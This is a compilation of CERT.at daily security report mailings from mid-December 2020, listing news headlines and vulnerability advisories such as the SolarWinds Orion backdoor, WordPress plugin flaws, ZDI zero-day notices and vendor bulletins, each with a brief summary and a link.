∗∗∗ PTC Kepware LinkMaster ∗∗∗
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-20-352-03
∗∗∗ ctrlX Products affected by OpenSSL Vulnerability CVE-2020-1971 ∗∗∗
---------------------------------------------
https://psirt.bosch.com/security-advisories/bosch-sa-274557.html
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 16-12-2020 18:00 − Thursday 17-12-2020 18:00
Handler: Robert Waldner
Co-Handler: Dimitri Robl
=====================
= News =
=====================
∗∗∗ Maximizing Your Defense with Windows DNS Logging ∗∗∗
---------------------------------------------
In part 3 of 5 of this blog series, learn how to improve your log collection deployment. Follow a sample Windows log scenario and receive a deployment checklist to help optimize your DNS logging.
---------------------------------------------
https://www.domaintools.com/resources/blog/maximizing-your-defense-with-win…
∗∗∗ IoT: When security risks end up under the Christmas tree ∗∗∗
---------------------------------------------
Experts examined popular connected gadgets for security vulnerabilities and data hunger and made alarming findings.
---------------------------------------------
https://futurezone.at/netzpolitik/iot-wenn-sicherheitsrisiken-unterm-weihna…
∗∗∗ DNS Logs in Public Clouds, (Wed, Dec 16th) ∗∗∗
---------------------------------------------
The current Solarwinds/Sunburst/Fireeye incident and its associated command&control (C2) traffic to avsvmcloud[.]com domains have spurred potentially affected Solarwinds customers to search their logs and data for any presence of this C2 domain.
---------------------------------------------
https://isc.sans.edu/diary/rss/26892
∗∗∗ The NoneNone Brute Force Attacks: Even Hackers Need QA ∗∗∗
---------------------------------------------
For the last few weeks we’ve seen and blocked an increase in brute-force, credential stuffing, and dictionary attacks targeting the WordPress xmlrpc.php endpoint, on some days exceeding 150 million attacks against 1.9 million sites in a 24-hour period.
---------------------------------------------
https://www.wordfence.com/blog/2020/12/the-nonenone-brute-force-attacks-eve…
=====================
= Vulnerabilities =
=====================
∗∗∗ WordPress plugin with 5 million installs has a critical vulnerability ∗∗∗
---------------------------------------------
The team behind a popular WordPress plugin has disclosed a critical file upload vulnerability and issued a patch. The vulnerable plugin, Contact Form 7, has over 5 million active installations making this upgrade a necessity for WordPress site owners out there.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/wordpress-plugin-with-5-mill…
∗∗∗ CVE-2020-25695 Privilege Escalation in Postgresql ∗∗∗
---------------------------------------------
This is my first and probably only post for the year, and covers a fun privilege escalation vulnerability I found in Postgresql. This affects all supported versions of Postgresql going back to 9.5; it is likely that it affects most earlier versions as well. (Note: fixed versions were released on 12 Nov. 2020.)
---------------------------------------------
https://staaldraad.github.io/post/2020-12-15-cve-2020-25695-postgresql-priv…
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (firefox-esr, sympa, thunderbird, tomcat8, and xerces-c), Fedora (fprintd, kernel, libfprint, and synergy), Mageia (bitcoin, dpic, firefox, jasper, jupyter-notebook, sam2p, thunderbird, and x11-server), Oracle (firefox, gd, kernel, net-snmp, openssl, python-rtslib, samba, and targetcli), Red Hat (fapolicyd, openshift, Red Hat Virtualization, and web-admin-build), SUSE (xen), and Ubuntu (unzip).
---------------------------------------------
https://lwn.net/Articles/840583/
∗∗∗ Security Advisory - Out Of Bound Read Vulnerability in Huawei Smartphone ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201216-…
∗∗∗ Security Advisory - Use after Free Vulnerability in Huawei Product ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201216-…
∗∗∗ Security Advisory - Information Leak Vulnerability in Huawei Product ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201216-…
∗∗∗ Security Advisory - Resource Management Errors Vulnerability in Huawei Smartphone Product ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201216-…
∗∗∗ Security Bulletin: A GNU glibc vulnerability affects IBM Watson Text to Speech and Speech to Text (IBM Watson Speech Services for Cloud Pak for Data 1.2) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-gnu-glibc-vulnerability…
∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to an information disclosure. (CVE-2020-4386) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-…
∗∗∗ Security Bulletin: Spring Framework vulnerabilities affect IBM Watson Text to Speech and Speech to Text (IBM Watson Speech Services for Cloud Pak for Data 1.2) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-spring-framework-vulnerab…
∗∗∗ Security Bulletin: Apache Tomcat vulnerabilities affect IBM Watson Text to Speech and Speech to Text (IBM Watson Speech Services for Cloud Pak for Data 1.2) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-apache-tomcat-vulnerabili…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect Rational Performance Tester ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Java Vulnerablity affects IBM Watson Speech Services for Cloud Pak for Data 1.2 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-java-vulnerablity-affects…
∗∗∗ Security Bulletin: Multiple Vulnerabilities Have Been Identified In IBM Security Verify Privilege Manager previously known as IBM Security Privilege Manager ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Vulnerability in IBM Java SDK and IBM Java Runtime affects Rational Performance Tester ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect Rational Service Tester ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect z/TPF ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ F5 BIG-IP: Multiple Vulnerabilities ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-1245
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 15-12-2020 18:00 − Wednesday 16-12-2020 18:00
Handler: Robert Waldner
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Video: Shopping safely on the Amazon Marketplace ∗∗∗
---------------------------------------------
On Amazon you can order directly from Amazon, but also from independent Marketplace sellers. It is above all in the Marketplace, however, that criminals are also up to mischief! In this video you will learn what the Marketplace is and, most importantly, how to order safely there as well.
---------------------------------------------
https://www.watchlist-internet.at/news/video-sicher-einkaufen-im-amazon-mar…
=====================
= Vulnerabilities =
=====================
∗∗∗ HPE discloses critical zero-day in server management software ∗∗∗
---------------------------------------------
Hewlett Packard Enterprise (HPE) has disclosed a zero-day bug in the latest versions of its proprietary HPE Systems Insight Manager (SIM) software for Windows and Linux. While security updates are not yet available for this remote code execution (RCE) vulnerability, HPE has provided Windows mitigation info and is working on addressing the zero-day. ... The vulnerability ... is tracked as CVE-2020-7200 and it affects HPE Systems Insight Manager (SIM) 7.6.x.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hpe-discloses-critical-zero-…
∗∗∗ VMSA-2020-0028 VMware Carbon Black Cloud macOS Sensor installer file overwrite issue (CVE-2020-4008) ∗∗∗
---------------------------------------------
The installer of the macOS Sensor for VMware Carbon Black Cloud handles certain files in an insecure way. VMware has evaluated the severity of this issue to be in the Low severity range with a CVSSv3 base score of 3.6.
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2020-0028.html
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (firefox-esr), Fedora (mingw-openjpeg2, openjpeg2, and synergy), openSUSE (audacity and gdm), Oracle (libexif, libpq, and thunderbird), Red Hat (firefox, gnutls, go-toolset:rhel8, java-1.7.1-ibm, java-1.8.0-ibm, kernel, kernel-rt, linux-firmware, mariadb-connector-c, mariadb:10.3, memcached, net-snmp, nginx:1.16, nodejs:12, openssl, pacemaker, postgresql:10, python-django-horizon, python-XStatic-Bootstrap-SCSS, python-XStatic-jQuery, python-XStatic-jQuery224 and python-django-horizon), Scientific Linux (gd, kernel, pacemaker, python-rtslib, samba and targetcli), SUSE (PackageKit, openssh, spice and spice-gtk), Ubuntu (firefox and imagemagick).
---------------------------------------------
https://lwn.net/Articles/840398/
∗∗∗ ABB Central Licensing System Vulnerabilities, impact on Symphony Plus, Composer Harmony, Composer Melody, Harmony OPC Server ∗∗∗
---------------------------------------------
https://search.abb.com/library/Download.aspx?DocumentID=2PAA123981&Language…
∗∗∗ ABB Multiple Vulnerabilities in Symphony PlusHistorian ∗∗∗
---------------------------------------------
https://search.abb.com/library/Download.aspx?DocumentID=2PAA123982&Language…
∗∗∗ ABB Multiple Vulnerabilities in Symphony Plus Operations ∗∗∗
---------------------------------------------
https://search.abb.com/library/Download.aspx?DocumentID=2PAA123980&Language…
∗∗∗ Security Advisory - Improper Authentication Vulnerability in Some Huawei Products ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200318-…
∗∗∗ Security Advisory - Out of Bound Read Vulnerability in Huawei Product ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201216-…
∗∗∗ Security Advisory - Improper Authentication Vulnerability in Huawei Product ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201216-…
∗∗∗ Security Advisory - Out Of Bound Read Vulnerability in Huawei Smartphone ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201216-…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect IBM QRadar SIEM ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: PostgresSQL JDBC Driver as used in IBM QRadar SIEM is vulnerable to information disclosure (CVE-2020-13692) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-postgressql-jdbc-driver-a…
∗∗∗ Security Bulletin: Open Source Security issues for NPS console. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-open-source-security-issu…
∗∗∗ Security Bulletin: Multiple Security Vulnerabilities Affect IBM WebSphere Application Server in IBM Cloud ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera…
∗∗∗ Security Bulletin: Apache Santuario as used in IBM QRadar SIEM is vulnerable to improper input validation (CVE-2019-12400) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-apache-santuario-as-used-…
∗∗∗ Security Bulletin: IBM RackSwitch firmware products are affected by a vulnerability in the Kernel (CVE-2020-12464) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-rackswitch-firmware-p…
∗∗∗ Security Bulletin: A security vulnerability in Node.js npm package affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
∗∗∗ Security Bulletin: App Connect Enterprise Certified Container may be vulnerable to buffer overflows, Denial of Service or HTTP request smuggling ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce…
∗∗∗ Security Bulletin: Netcool Operations Insight – Cloud Native Event Analytics is affected by an Apache Commons Codec vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-netcool-operations-insigh…
∗∗∗ Security Bulletin: A security vulnerability in Node.js node-forge module affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
∗∗∗ QEMU vulnerability CVE-2020-14364 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K09081535?utm_source=f5support&utm_mediu…
∗∗∗ QEMU vulnerability CVE-2020-25084 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K41301038?utm_source=f5support&utm_mediu…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 14-12-2020 18:00 − Tuesday 15-12-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ SolarWinds hackers have a clever way to bypass multi-factor authentication ∗∗∗
---------------------------------------------
Hackers who hit SolarWinds compromised a think tank three separate times.
---------------------------------------------
https://arstechnica.com/?p=1729836
∗∗∗ Paypal scams: how you can protect yourself ∗∗∗
---------------------------------------------
Paypal is one of the largest and most popular payment services and is therefore in the crosshairs of many cybercriminals. How can you protect yourself from their tricks?
---------------------------------------------
https://www.welivesecurity.com/deutsch/2020/12/15/betrugsmaschen-der-paypal…
∗∗∗ Caution: Fake notifications from parcel services in circulation ∗∗∗
---------------------------------------------
Are you currently waiting for a parcel? Then beware of fake notifications by e-mail or SMS in the name of the Post, DHL or other parcel services! Criminals forge e-mails from well-known delivery services and claim that a delivery or customs fee of 1-2 euros must be paid. If this fee is paid by credit card, the criminals debit 50-90 euros month after month.
---------------------------------------------
https://www.watchlist-internet.at/news/vorsicht-gefaelschte-benachrichtigun…
∗∗∗ Hospitals are leaving millions of sensitive medical images exposed online ∗∗∗
---------------------------------------------
Cybersecurity researchers discover millions of medical files and associated personal data left discoverable on the open web due to being stored insecurely.
---------------------------------------------
https://www.zdnet.com/article/hospitals-are-leaving-millions-of-sensitive-m…
=====================
= Vulnerabilities =
=====================
∗∗∗ Xen Security Advisories ∗∗∗
---------------------------------------------
Xen has released 15 Security Advisories.
---------------------------------------------
https://xenbits.xen.org/xsa/
∗∗∗ URL Spoofing Vulnerability in Bitdefender SafePay (VA-8958) ∗∗∗
---------------------------------------------
An Origin Validation Error vulnerability in the SafePay component of Bitdefender Antivirus Plus allows a web resource to misrepresent itself in the URL bar. This issue affects Bitdefender Antivirus Plus versions prior to 25.0.7.29.
---------------------------------------------
https://www.bitdefender.com/support/security-advisories/url-spoofing-vulner…
∗∗∗ Apple security updates ∗∗∗
---------------------------------------------
Apple has released the following security updates: iOS 14.3 and iPadOS 14.3, macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave, macOS Server 5.11, tvOS 14.3, watchOS 7.2, Safari 14.0.2, iOS 12.5, watchOS 6.3
---------------------------------------------
https://support.apple.com/en-us/HT201222
∗∗∗ libarchive vulnerability CVE-2017-5601 ∗∗∗
---------------------------------------------
An error in the lha_read_file_header_1() function (archive_read_support_format_lha.c) in libarchive 3.2.2 allows remote attackers to trigger an out-of-bounds read memory access and subsequently cause a crash via a specially crafted archive. [...] The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.
---------------------------------------------
https://support.f5.com/csp/article/K50543013
∗∗∗ SECURITY BULLETIN: December 2020 Security Bulletin for Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 SP2 ∗∗∗
---------------------------------------------
Trend Micro has made a Critical Patch (CP) available for Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 SP2. This CP addresses multiple vulnerabilities related to CSRF protection bypass, cross-site scripting (XSS), authorization/authentication bypass, command execution and unauthenticated command injections.
---------------------------------------------
https://success.trendmicro.com/solution/000283077
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (libxstream-java and xen), Fedora (curl), openSUSE (curl, kernel, mariadb, and openssl-1_1), Oracle (kernel, libexif, thunderbird, and xorg-x11-server), Red Hat (curl, gd, kernel, kernel-rt, linux-firmware, net-snmp, openssl, pacemaker, python-rtslib, samba, targetcli, and xorg-x11-server), Scientific Linux (libexif, thunderbird, and xorg-x11-server), and SUSE (clamav, gdm, and kernel).
---------------------------------------------
https://lwn.net/Articles/840217/
∗∗∗ Synology-SA-20:28 File Station ∗∗∗
---------------------------------------------
A vulnerability allows remote attackers to read arbitrary files via a susceptible version of File Station.
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_20_28
∗∗∗ Citrix Hypervisor Security Update ∗∗∗
---------------------------------------------
Several security issues have been identified that, collectively, may allow privileged code running in a guest VM to compromise the host or cause a denial of service.
---------------------------------------------
https://support.citrix.com/article/CTX286756
∗∗∗ WAGO Series 750-88x and 750-352 (Update A) ∗∗∗
---------------------------------------------
This updated advisory is a follow-up to the original advisory titled ICSA-20-308-01 WAGO Series 750-88x and 750-352 that was published November 3, 2020, on the ICS webpage on us-cert.gov. This advisory contains mitigations for an Uncontrolled Resource Consumption vulnerability in the WAGO Fieldbus Ethernet coupler.
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-20-308-01
∗∗∗ Eclipse Jetty vulnerability CVE-2019-10241 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K01869532
∗∗∗ HCL Domino: Vulnerability allows execution of arbitrary code with the privileges of the service ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1237
∗∗∗ Red Hat Enterprise Linux: Vulnerability allows bypassing of security measures ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1238
∗∗∗ Security Bulletin: A security vulnerability in angular.js affects IBM Cloud Pak for Multicloud Management Infrastructure Management and Managed Service. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
∗∗∗ Security Bulletin: Gradle version in IBP javaenv and dind images depends on vulnerable Apache Ant ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-gradle-version-in-ibp-jav…
∗∗∗ Security Bulletin: A security vulnerability in GO affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
∗∗∗ Security Bulletin: Vulnerability in nss and nspr CVE-2019-17006. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-nss-and-…
∗∗∗ Security Bulletin: A vulnerability has been identified in jwt-go shipped with IBM Netcool Operations Insight Event Integrations Operator (CVE-2020-26160) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-have-been…
∗∗∗ Security Bulletin: A security vulnerability in Node.js serialize-javascript affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
∗∗∗ Security Bulletin: IBP javaenv and dind images ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibp-javaenv-and-dind-imag…
∗∗∗ Security Bulletin: A security vulnerability in Node.js acorn and bootstrap-select affects IBM Cloud Pak for Multicloud Management Infrastructure Management and Managed Service. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
∗∗∗ Security Bulletin: A security vulnerability in GO affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-…
∗∗∗ Security Bulletin: Vulnerability in libssh2 CVE-2019-17498. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-libssh2-…
∗∗∗ ZDI-20-1444: (0Day) Eaton EASYsoft E70 File Parsing Type Confusion Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1444/
∗∗∗ ZDI-20-1443: (0Day) Eaton EASYsoft E70 File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1443/
∗∗∗ ZDI-20-1442: (0Day) Eaton EASYsoft E70 File Parsing Type Confusion Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1442/
∗∗∗ ZDI-20-1441: (0Day) Eaton EASYsoft E70 File Parsing Type Confusion Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1441/
∗∗∗ ZDI-20-1429: D-Link DAP-1860 uhttpd Authentication Bypass Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1429/
∗∗∗ ZDI-20-1428: D-Link DAP-1860 HNAP Authorization Command Injection Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1428/
∗∗∗ ZDI-20-1427: D-Link Multiple Routers dhttpd Authentication Bypass Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1427/
∗∗∗ ZDI-20-1426: D-Link Multiple Routers dhttpd Command Injection Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1426/
∗∗∗ ZDI-20-1438: (0Day) D-Link DCS-960L HTTP Authorization Header Stack-based Buffer Overflow Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1438/
∗∗∗ ZDI-20-1437: (0Day) D-Link DCS-960L HNAP LoginPassword Incorrect Implementation of Authentication Algorithm Authentication Bypass Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1437/
∗∗∗ ZDI-20-1436: (0Day) D-Link DCS-960L HNAP Login Cookie Format String Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1436/
∗∗∗ ZDI-20-1435: (0Day) D-Link DCS-960L HNAP Cookie Format String Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-20-1435/
=====================
= End-of-Day report =
=====================
Timeframe: Friday 11-12-2020 18:00 − Monday 14-12-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Backdoor in SolarWinds Orion ∗∗∗
---------------------------------------------
Following a successful attack on the IT security service provider FireEye last week, new information about the incident has been published. As has now become known, the attacks were carried out by means of a so-called "supply chain attack"; both SolarWinds and FireEye report that, in a successful attack on SolarWinds, the attackers planted a backdoor in updates for the product "SolarWinds Orion". Affected are [...]
---------------------------------------------
https://cert.at/de/aktuelles/2020/12/backdoor-in-solarwinds-orion
∗∗∗ pfSense Firewall Configuration Audit with pfAudit ∗∗∗
---------------------------------------------
pfSense is a very popular free and open source firewall solution. It does not only provide classic firewall services but has plenty of features like VPN server or can offer DNS, DHCP, proxy services [...]
---------------------------------------------
https://blog.rootshell.be/2020/12/14/pfsense-firewall-configuration-audit-w…
∗∗∗ PyMICROPSIA: New Information-Stealing Trojan from AridViper ∗∗∗
---------------------------------------------
We've identified a new information-stealing Trojan we call PyMICROPSIA, related to the previously identified MICROPSIA malware family.
---------------------------------------------
https://unit42.paloaltonetworks.com/pymicropsia/
=====================
= Vulnerabilities =
=====================
∗∗∗ Patch day: Google closes dangerous holes in Android 8.0 to 11 ∗∗∗
---------------------------------------------
Important security updates have been released for a number of Android versions. Among other things, attackers could execute malicious code.
---------------------------------------------
https://heise.de/-4988647
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (lxml, openexr, openssl, and openssl1.0), Fedora (libpri, libxls, mediawiki, nodejs, opensc, php-wikimedia-assert, php-zordius-lightncandy, squeezelite, and wireshark), openSUSE (curl, openssh, openssl-1_0_0, python-urllib3, and rpmlint), Red Hat (libexif, libpq, and thunderbird), Slackware (p11), SUSE (kernel, Kubernetes, etcd, helm, openssl, openssl-1_0_0, and python), and Ubuntu (linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-5.4, [...]
---------------------------------------------
https://lwn.net/Articles/840110/
∗∗∗ Zero-day hole in WordPress SMTP plug-in allows resetting of admin passwords ∗∗∗
---------------------------------------------
The plug-in stores a log file in a directory that may be insecure. Hackers thereby gain access to the file, which also records links for resetting administrator passwords. A patch for the vulnerability is now available.
---------------------------------------------
https://www.zdnet.de/88390454/zero-day-luecke-im-wordpress-smtp-plug-in-erl…
∗∗∗ BIND vulnerability CVE-2020-8624 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K91090139
∗∗∗ Apache Struts vulnerability CVE-2012-0392 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K13434228
∗∗∗ Apache Struts vulnerability CVE-2012-0391 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K20127031
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Security SiteProtector System ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: IBM Resilient Platform could allow formula injection in Excel (CVE-2020-4633) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-platform-co…
∗∗∗ Security Bulletin: IBM Cloud Transformation Advisor is affected by a Node.js vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-transformation-…
∗∗∗ Security Bulletin: Security Vulnerabilities in GNU glibc affect IBM Cloud Pak for Data – GNU glibc (CVE-2020-1751) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
∗∗∗ Security Bulletin: Apache Commons Codec could allow a remote attacker to obtain sensitive information, caused by the improper validation of input. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-apache-commons-codec-coul…
∗∗∗ Security Bulletin: Apache Hadoop could allow a remote attacker to obtain sensitive information that could affect IBM Streams. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-apache-hadoop-could-allow…
∗∗∗ Security Bulletin: App Connect Enterprise Certified Container may be vulnerable to man in the middle attack through use of OpenSSL (CVE-2019-1551) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affects WebSphere Application Server October 2020 CPU that is bundled with IBM WebSphere Application Server Patterns ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Java vulnerability CVE-2020-2590 affecting IBM Streams ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-java-vulnerability-cve-20…
∗∗∗ Security Bulletin: Open Source Security issues for NPS service provider ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-open-source-security-issu…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 10-12-2020 18:00 − Friday 11-12-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Widespread malware campaign seeks to silently inject ads into search results, affects multiple browsers ∗∗∗
---------------------------------------------
A persistent malware campaign has been actively distributing Adrozek, an evolved browser modifier malware at scale since at least May 2020. At its peak in August, the threat was observed on over 30,000 devices every day. The malware is designed to inject ads into search engine results pages and affects multiple browsers.
---------------------------------------------
https://www.microsoft.com/security/blog/2020/12/10/widespread-malware-campa…
∗∗∗ Symantec Messaging Gateway could leak passwords ∗∗∗
---------------------------------------------
An important security update has been released for Symantec Messaging Gateway.
---------------------------------------------
https://heise.de/-4986723
∗∗∗ PoC Released for Unpatched Windows Vulnerability Present Since 2006 ∗∗∗
---------------------------------------------
Details and a proof-of-concept (PoC) exploit have been released for an unpatched privilege escalation vulnerability in Windows related to the PsExec administration tool. The vulnerability was discovered by Tenable researcher David Wells and it was disclosed this week after Microsoft failed to release a patch within 90 days.
---------------------------------------------
https://www.securityweek.com/poc-released-unpatched-windows-vulnerability-p…
∗∗∗ myusenet.de, bigusenet.de & Co.: New fraudulent streaming platforms lead into a subscription trap! ∗∗∗
---------------------------------------------
Watchlist Internet repeatedly reports on fraudulent streaming platforms that lead into a subscription trap. We are currently receiving numerous reports warning of myusenet.de, foxusenet.de, bigusenet.de and megausenet.de. These new streaming platforms look different from the usual fake streaming platforms, but the scheme remains the same: after registering, you receive a payment demand for 384 euros.
---------------------------------------------
https://www.watchlist-internet.at/news/myusenetde-bigusenetde-co-neue-betru…
∗∗∗ Update now: Researchers warn of security vulnerabilities in these widely used point-of-sale terminals ∗∗∗
---------------------------------------------
Security researchers disclose vulnerabilities including default passwords in two of the largest PoS manufacturers in the world.
---------------------------------------------
https://www.zdnet.com/article/update-now-researchers-warn-of-security-vulne…
=====================
= Vulnerabilities =
=====================
∗∗∗ Adobe Releases Security Updates for Acrobat and Reader ∗∗∗
---------------------------------------------
Adobe has released security updates to address a vulnerability in Acrobat and Reader. An attacker could exploit this vulnerability to obtain sensitive information.
---------------------------------------------
https://us-cert.cisa.gov/ncas/current-activity/2020/12/10/adobe-releases-se…
∗∗∗ Hotfix arms Sophos firewalls and routers against attacks ∗∗∗
---------------------------------------------
Under certain conditions, attackers could attack the Cyberoam network operating system.
---------------------------------------------
https://heise.de/-4986665
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
